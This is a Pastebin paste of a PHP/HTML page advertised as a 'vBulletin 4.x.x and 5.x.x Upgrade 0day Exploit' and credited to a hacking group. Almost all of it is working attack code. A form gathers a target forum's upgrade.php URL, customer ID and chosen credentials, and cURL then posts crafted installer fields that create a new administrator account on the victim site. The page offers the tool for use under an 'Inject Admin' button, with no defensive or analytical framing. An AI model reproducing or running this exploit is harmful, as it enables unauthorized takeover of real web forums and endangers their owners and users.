Advertisement
Guest User

vBulletin 0day Exploit | www.madura-cyber.org

a guest
Sep 13th, 2013
1,514
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.73 KB | None | 0 0
  1.  
  2.  
  3.  
  4. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  5.  
  6. <title>vBulletin 0day</title>
  7.  
  8. <style type="text/css">
  9.  
  10. <!--
  11.  
  12. body {
  13.  
  14.     background-color: #000;
  15.  
  16.     text-align: center;
  17.  
  18.     color: #063;
  19.  
  20.     font-size: large;
  21.  
  22. }
  23.  
  24. .a {    font-size: 24px;
  25.  
  26. }
  27.  
  28. .f {    color: #060;
  29.  
  30. }
  31.  
  32. .gbf {    color: #F00;
  33.  
  34. }
  35.  
  36. .dd {
  37.  
  38.     color: #F00;
  39.  
  40. }
  41.  
  42. .w {
  43.  
  44.     font-size: large;
  45.  
  46. }
  47.  
  48. a:link {
  49.  
  50.     text-decoration: none;
  51.  
  52. }
  53.  
  54. a:visited {
  55.  
  56.     text-decoration: none;
  57.  
  58. }
  59.  
  60. a:hover {
  61.  
  62.     text-decoration: none;
  63.  
  64. }
  65.  
  66. a:active {
  67.  
  68.     text-decoration: none;
  69.  
  70. }
  71.  
  72. -->
  73.  
  74. </style></head><body>
  75.  
  76. <p class="a">
  77.  
  78. <h1><span class="gbf">vBulletin</span> 4.x.x and 5.x.x Upgrade 0day Exploit</h1>
  79.  
  80. <br>Created by: 1337
  81. <br>Found on: 08/22/2013
  82. <br>Website: http://www.madleets.com
  83. </p>
  84. <br>
  85. <?php
  86. //extract data from the post
  87. if(isset($_POST['submit'])){
  88. extract($_POST);
  89. //set POST variables
  90. $url = $_POST['url'];
  91. $fields = array(
  92.                         'ajax' => urlencode('1'),
  93.                         'version' => urlencode('install'),
  94.                         'checktable' => urlencode('false'),
  95.                         'firstrun' => urlencode('false'),
  96.                         'step' => urlencode('7'),
  97.                         'startat' => urlencode('0'),
  98.                         'only' => urlencode('false'),
  99.                         'customerid' => urlencode($_POST['customerid']),
  100.                         'options[skiptemplatemerge]' => urlencode('0'),
  101.                         'response' => urlencode('yes'),
  102.                         'htmlsubmit' => urlencode('1'),
  103.                         'htmldata[username]' => urlencode($_POST['username']),
  104.                         'htmldata[password]' => urlencode($_POST['password']),
  105.                         'htmldata[confirmpassword]' => urlencode($_POST['password']),
  106.                         'htmldata[email]' => urlencode($_POST['email'])
  107.                 );
  108. //url-ify the data for the POST
  109. foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
  110. rtrim($fields_string, '&');
  111. //open connection
  112. $ch = curl_init();
  113. //set the url, number of POST vars, POST data
  114. curl_setopt($ch,CURLOPT_URL, $url);
  115. curl_setopt($ch,CURLOPT_POST, count($fields));
  116. curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
  117. curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
  118. curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );
  119. //execute post
  120. $result = curl_exec($ch);
  121. //close connection
  122. curl_close($ch);
  123. exit();
  124. }
  125. ?>
  126. <center>
  127. <form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
  128. <span>Example:http://test.com/forum/install/upgrade.php</span><br>
  129.   <span>Website:</span>
  130.     <input name="url" type="text" tabindex="1" size="60" />
  131.     <br>
  132.     <span>Customer ID:</span>
  133.     <input name="customerid" type="text" tabindex="2" size="40" />
  134.     <br>
  135.     <span>Username:</span>
  136.     <input name="username" type="text" tabindex="3" size="40" />
  137.     <br>
  138.     <span>Password:</span>
  139.     <input name="password" type="text" tabindex="4" size="40" />
  140.     <br>
  141.     <span>Email:</span>
  142.     <input name="email" type="text" tabindex="5" maxlength="40" />
  143.    
  144. <input name="submit" type="submit" value="Inject Admin">
  145. </form>
  146. </center>
  147.  
  148. <p class="a">------------------------------------------------------------------------------------------------------------------</p>
  149.  
  150. <p class="a">We are L33t Pakistani H4x0rZ | MaDLeeTs TeaM </p>
  151.  
  152. <p class="a">------------------------------------------------------------------------------------------------------------------</p>
  153.  
  154. </div>
  155.        
  156.  </pre>
  157.  
  158. <p class="a">&nbsp;</p>
  159. <p align="center">
  160.  
  161.   </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement